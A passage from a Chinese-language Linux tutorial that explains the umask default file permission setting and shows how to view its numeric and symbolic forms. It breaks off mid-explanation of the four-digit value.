下面我们就来分别讲解它的这些特殊属性.
1. Linux文件默认权限:umask
我们在新建立一个文件时,它都有自己的默认属性.它们的默认属性是通过"umask"值来设定的.那么如何来查看和设置umask值呢?
①.查看umask值
[root@localhost /]#umask(数字形式)
0022
[root@localhost /]#umask –S(符号形式)
u=rwx,g=rx,o=rx
上面的命令显示出umask值的两种表现形式.我们看到数字表现出来的有4位数字,第一位数字用来表示特殊权限,我们在后面介绍,第二
